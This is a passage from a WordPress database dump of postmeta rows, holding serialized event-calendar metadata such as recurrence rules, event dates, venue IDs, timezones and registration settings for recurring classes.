16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122224,263248,'_EventShowMapLink','1'),(122226,263248,'_EventCurrencySymbol',''),(122227,263248,'_EventCurrencyPosition','prefix'),(122228,263248,'_EventCost',''),(122221,263248,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122223,263248,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122233,263248,'_RTECregistrationsDisabled','1'),(122234,263248,'_RTECdeadlineType','start'),(122235,263248,'_RTECwhoCanRegister','any'),(122222,263248,'boldgrid_hide_page_title','1'),(122242,263248,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(119623,262750,'_EventOrigin','events-calendar'),(114433,262789,'_EventShowMapLink','1'),(114434,262789,'_EventShowMap','1'),(122507,263256,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122129,263245,'_RTECmaxRegistrations','30'),(122130,263245,'_EventVenueID','262507'),(119673,262751,'_EventShowMap','1'),(119669,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119682,262751,'_RTECregistrationsDisabled','1'),(119670,262751,'boldgrid_hide_page_title','1'),(119671,262751,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:6:\"Second\";s:3:\"day\";s:1:\"2\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2021-01-12 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-12 20:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(119668,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(119667,262751,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(115666,262791,'_EventTimezone','America/Denver'),(122508,263256,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(119712,262989,'protect_children',''),(119708,262989,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1608755008;s:12:\"_EventOrigin\";i:1608755008;s:13:\"_thumbnail_id\";i:1608755836;s:24:\"boldgrid_hide_page_title\";i:1608755008;s:17:\"_EventShowMapLink\";i:1608755008;s:13:\"_EventShowMap\";i:1608755008;s:15:\"_EventStartDate\";i:1608755836;s:13:\"_EventEndDate\";i:1608755836;s:18:\"_EventStartDateUTC\";i:1608755836;s:16:\"_EventEndDateUTC\";i:1608755836;s:14:\"_EventDuration\";i:1608755836;s:20:\"_EventCurrencySymbol\";i:1608755008;s:22:\"_EventCurrencyPosition\";i:1608755008;s:10:\"_EventCost\";i:1608755008;s:9:\"_EventURL\";i:1608755008;s:14:\"_EventTimezone\";i:1608755008;s:18:\"_EventTimezoneAbbr\";i:1608755008;s:27:\"_EventNextPendingRecurrence\";i:1608755008;s:26:\"_RTECregistrationsDisabled\";i:1608756215;s:17:\"_RTECdeadlineType\";i:1608755008;s:19:\"_RTECwhoCanRegister\";i:1608755008;s:23:\"_RTEClimitRegistrations\";i:1608755008;s:21:\"_RTECmaxRegistrations\";i:1608755008;s:16:\"_EventRecurrence\";i:1608755008;s:18:\"_RTECnumRegistered\";i:1608755008;s:12:\"_dp_original\";i:1608755008;s:13:\"_EventVenueID\";i:1608755008;s:16:\"tribe_events_cat\";i:1609185778;s:10:\"_edit_last\";i:1608755167;s:12:\"post_content\";i:1608756633;s:11:\"post_status\";i:1608755836;s:10:\"post_title\";i:1608755955;}'),(119416,262744,'_EventOrigin','events-calendar'),(120895,263177,'_EventTimezoneAbbr','MST'),(122520,263256,'protect_children',''),(122500,263256,'_EventEndDate','2021-11-07 13:30:00'),(115667,262791,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:10:{i:262791;a:2:{s:9:\"timestamp\";i:1610874000;s:8:\"duration\";i:4200;}i:262792;a:2:{s:9:\"timestamp\";i:1613898000;s:8:\"duration\";i:4200;}i:262793;a:2:{s:9:\"timestamp\";i:1616317200;s:8:\"duration\";i:4200;}i:262794;a:2:{s:9:\"timestamp\";i:1618736400;s:8:\"duration\";i:4200;}i:262795;a:2:{s:9:\"timestamp\";i:1621155600;s:8:\"duration\";i:4200;}i:262796;a:2:{s:9:\"timestamp\";i:1624179600;s:8:\"duration\";i:4200;}i:262797;a:2:{s:9:\"timestamp\";i:1626598800;s:8:\"duration\";i:4200;}i:262798;a:2:{s:9:\"timestamp\";i:1629018000;s:8:\"duration\";i:4200;}i:262799;a:2:{s:9:\"timestamp\";i:1632042000;s:8:\"duration\";i:4200;}i:262800;a:2:{s:9:\"timestamp\";i:1634461200;s:8:\"duration\";i:4200;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:10;}'),(122377,263252,'_RTECregistrationsDisabled','1'),(122337,263251,'_EventURL',''),(114439,262789,'_EventEndDateUTC','2020-12-20 17:10:00'),(120896,263177,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(124559,263319,'_EventURL',''),(114440,262789,'_EventDuration','4200'),(114441,262789,'_EventCurrencySymbol',''),(115661,262791,'_EventVenueID','262507'),(114432,262789,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-10-17\";s:14:\"EventStartDate\";s:19:\"2020-12-20 09:00:00\";s:12:\"EventEndDate\";s:19:\"2020-12-20 10:10:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(114435,262789,'_EventVenueID','262507'),(114436,262789,'_EventStartDate','2020-12-20 09:00:00'),(114437,262789,'_EventEndDate','2020-12-20 10:10:00'),(114438,262789,'_EventStartDateUTC','2020-12-20 16:00:00'),(122529,263256,'_wp_old_slug','the-easy-way'),(122530,263256,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:2:{i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122511,263256,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122510,263256,'boldgrid_hide_page_title','1'),(122525,263256,'_RTECmaxRegistrations','30'),(122526,263256,'_EventVenueID','262507'),(122528,263256,'_wp_old_slug','soul-travel-2-class'),(119429,262744,'_EventCurrencySymbol',''),(119420,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119422,262744,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114199;s:24:\"boldgrid_hide_page_title\";i:1608114199;s:16:\"_EventRecurrence\";i:1608114199;s:17:\"_EventShowMapLink\";i:1608114199;s:13:\"_EventShowMap\";i:1608114199;s:20:\"_EventCurrencySymbol\";i:1608114199;s:22:\"_EventCurrencyPosition\";i:1608114199;s:10:\"_EventCost\";i:1608114199;s:9:\"_EventURL\";i:1608114199;s:14:\"_EventTimezone\";i:1608114199;s:27:\"_EventNextPendingRecurrence\";i:1608114199;s:12:\"_dp_original\";i:1608114199;s:16:\"protect_children\";i:1608114199;s:26:\"_RTECregistrationsDisabled\";i:1608114199;s:17:\"_RTECdeadlineType\";i:1608114199;s:19:\"_RTECwhoCanRegister\";i:1608114199;s:23:\"_RTEClimitRegistrations\";i:1608114199;s:21:\"_RTECmaxRegistrations\";i:1608114199;s:13:\"_thumbnail_id\";i:1608114199;s:13:\"_EventVenueID\";i:1608114199;s:12:\"_wp_old_slug\";i:1608114199;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114199;s:16:\"tribe_events_cat\";i:1608139399;}'),(119713,262989,'protect_children',''),(124574,263321,'boldgrid_hide_page_title','0'),(121687,263232,'_EventShowMapLink','1'),(121690,263232,'_EventEndDate','2021-01-18 20:30:00'),(124551,263319,'_EventStartDate','2021-01-14 08:00:00'),(121691,263232,'_EventStartDateUTC','2021-01-19 02:00:00'),(124549,263319,'_EventShowMap','1'),(124550,263319,'_EventVenueID','262507'),(121692,263232,'_EventEndDateUTC','2021-01-19 03:30:00'),(124558,263319,'_EventCost',''),(122333,263251,'_EventShowMap','1'),(122335,263251,'_EventCurrencyPosition','prefix'),(119704,262987,'_form_id','13'),(122344,263251,'_RTEClimitRegistrations','0'),(122345,263251,'_RTECmaxRegistrations','30'),(122330,263251,'boldgrid_hide_page_title','1'),(122348,263251,'_wp_old_slug','soul-travel-2-class'),(122349,263251,'_wp_old_slug','the-easy-way'),(122350,263251,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:12:{i:0;a:2:{s:9:\"timestamp\";i:1607256000;s:8:\"duration\";i:5400;}i:1;a:2:{s:9:\"timestamp\";i:1609675200;s:8:\"duration\";i:5400;}i:2;a:2:{s:9:\"timestamp\";i:1612699200;s:8:\"duration\";i:5400;}i:3;a:2:{s:9:\"timestamp\";i:1615118400;s:8:\"duration\";i:5400;}i:4;a:2:{s:9:\"timestamp\";i:1617537600;s:8:\"duration\";i:5400;}i:5;a:2:{s:9:\"timestamp\";i:1619956800;s:8:\"duration\";i:5400;}i:6;a:2:{s:9:\"timestamp\";i:1622980800;s:8:\"duration\";i:5400;}i:7;a:2:{s:9:\"timestamp\";i:1625400000;s:8:\"duration\";i:5400;}i:8;a:2:{s:9:\"timestamp\";i:1627819200;s:8:\"duration\";i:5400;}i:9;a:2:{s:9:\"timestamp\";i:1630843200;s:8:\"duration\";i:5400;}i:10;a:2:{s:9:\"timestamp\";i:1633262400;s:8:\"duration\";i:5400;}i:11;a:2:{s:9:\"timestamp\";i:1636286400;s:8:\"duration\";i:5400;}}s:6:\"update\";a:0:{}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:22;}'),(122340,263251,'protect_children',''),(122329,263251,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122332,263251,'_EventShowMapLink','1'),(122334,263251,'_EventCurrencySymbol',''),(122521,263256,'_RTECregistrationsDisabled','1'),(122522,263256,'_RTECdeadlineType','start'),(122523,263256,'_RTECwhoCanRegister','any'),(122502,263256,'_EventDuration','5400'),(122503,263256,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122355,263252,'_EventStartDateUTC','2021-07-04 18:00:00'),(122346,263251,'_EventVenueID','262507'),(124560,263319,'_EventTimezone','America/Denver'),(124561,263319,'_EventTimezoneAbbr','MST'),(122341,263251,'_RTECregistrationsDisabled','1'),(119655,262750,'_wp_old_slug','letters-of-light-and-sound-1-2'),(119631,262750,'_tribe_modified_fields','a:23:{s:12:\"_EventOrigin\";i:1608114200;s:24:\"boldgrid_hide_page_title\";i:1608114200;s:16:\"_EventRecurrence\";i:1608114200;s:17:\"_EventShowMapLink\";i:1608114200;s:13:\"_EventShowMap\";i:1608114200;s:20:\"_EventCurrencySymbol\";i:1608114200;s:22:\"_EventCurrencyPosition\";i:1608114200;s:10:\"_EventCost\";i:1608114200;s:9:\"_EventURL\";i:1608114200;s:14:\"_EventTimezone\";i:1608114200;s:27:\"_EventNextPendingRecurrence\";i:1608114200;s:12:\"_dp_original\";i:1608114200;s:16:\"protect_children\";i:1608114200;s:26:\"_RTECregistrationsDisabled\";i:1608114200;s:17:\"_RTECdeadlineType\";i:1608114200;s:19:\"_RTECwhoCanRegister\";i:1608114200;s:23:\"_RTEClimitRegistrations\";i:1608114200;s:21:\"_RTECmaxRegistrations\";i:1608114200;s:13:\"_thumbnail_id\";i:1608114200;s:13:\"_EventVenueID\";i:1608114200;s:12:\"_wp_old_slug\";i:1608114200;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1608114200;s:16:\"tribe_events_cat\";i:1608139400;}'),(122365,263252,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122368,263252,'_EventShowMapLink','1'),(122370,263252,'_EventCurrencySymbol',''),(122371,263252,'_EventCurrencyPosition','prefix'),(122372,263252,'_EventCost',''),(122373,263252,'_EventURL',''),(122374,263252,'_EventTimezone','America/Denver'),(121686,263232,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"Third\";s:3:\"day\";s:1:\"1\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-02-15\";s:14:\"EventStartDate\";s:19:\"2021-01-18 19:00:00\";s:12:\"EventEndDate\";s:19:\"2021-01-18 20:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(124562,263321,'protect_children',''),(124563,263321,'_tribe_modified_fields','a:31:{s:16:\"protect_children\";i:1610630038;s:12:\"_EventOrigin\";i:1610630038;s:13:\"_thumbnail_id\";i:1610630038;s:26:\"_RTECregistrationsDisabled\";i:1610630038;s:17:\"_RTECdeadlineType\";i:1610630038;s:19:\"_RTECwhoCanRegister\";i:1610630038;s:23:\"_RTEClimitRegistrations\";i:1610630038;s:21:\"_RTECmaxRegistrations\";i:1610630038;s:24:\"boldgrid_hide_page_title\";i:1610630038;s:16:\"_EventRecurrence\";i:1610630212;s:17:\"_EventShowMapLink\";i:1610630038;s:13:\"_EventShowMap\";i:1610630038;s:13:\"_EventVenueID\";i:1610630039;s:15:\"_EventStartDate\";i:1610630212;s:13:\"_EventEndDate\";i:1610630212;s:18:\"_EventStartDateUTC\";i:1610630212;s:16:\"_EventEndDateUTC\";i:1610630212;s:14:\"_EventDuration\";i:1610630212;s:20:\"_EventCurrencySymbol\";i:1610630039;s:22:\"_EventCurrencyPosition\";i:1610630039;s:10:\"_EventCost\";i:1610630039;s:9:\"_EventURL\";i:1610630039;s:14:\"_EventTimezone\";i:1610630039;s:18:\"_EventTimezoneAbbr\";i:1610630039;s:12:\"_dp_original\";i:1610630039;s:10:\"_edit_last\";i:1610630110;s:10:\"post_title\";i:1610630110;s:12:\"post_content\";i:1610630212;s:16:\"tribe_events_cat\";i:1610655620;s:11:\"post_status\";i:1610630212;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630423;}'),(114418,262789,'boldgrid_hide_page_title','0'),(119427,262744,'_EventShowMapLink','1'),(122360,263252,'_EventOrigin','events-calendar'),(122361,263252,'_EventOrigin','events-calendar'),(122354,263252,'_EventStartDate','2021-07-04 